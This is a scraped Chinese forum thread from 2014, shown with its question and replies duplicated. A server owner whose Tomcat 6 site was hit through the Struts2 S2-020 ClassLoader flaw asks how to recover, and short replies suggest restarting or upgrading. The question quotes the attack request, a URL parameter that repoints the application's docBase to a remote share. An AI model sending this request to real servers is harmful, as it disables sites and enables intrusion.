服务器被人利用Struts2 S-20漏洞攻击了,如何恢复啊
日期:2014-05-17 浏览次数:20725 次
服务器被人利用Struts2 S-20漏洞攻击了,怎么恢复啊?
TOMCAT 6
被人执行了
http://127.0.0.1//HelloWorld.action?class.classLoader.resources.dirContext.docBase=//11.11.11.11/test
然后指向了一个不存在的共享目录,导致现在访问网站都是提示404错误
怎么恢复啊? 急求啊!
------解决方案--------------------
你这什么漏洞攻击啊,struts2只有在启用动态方法调用的情况下才会有使用ognl漏洞攻击的。你这个根本就是普通的传参,是你自己action中的问题
------解决方案--------------------
重启不行么?
------解决方案--------------------
升级sturts2.看看官方的解决方案
------解决方案--------------------
丢弃掉这东东算了,到处是漏洞
TOMCAT 6
被人执行了
http://127.0.0.1//HelloWorld.action?class.classLoader.resources.dirContext.docBase=//11.11.11.11/test
然后指向了一个不存在的共享目录,导致现在访问网站都是提示404错误
怎么恢复啊? 急求啊!
------解决方案--------------------
你这什么漏洞攻击啊,struts2只有在启用动态方法调用的情况下才会有使用ognl漏洞攻击的。你这个根本就是普通的传参,是你自己action中的问题
------解决方案--------------------
重启不行么?
------解决方案--------------------
升级sturts2.看看官方的解决方案
------解决方案--------------------
丢弃掉这东东算了,到处是漏洞
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
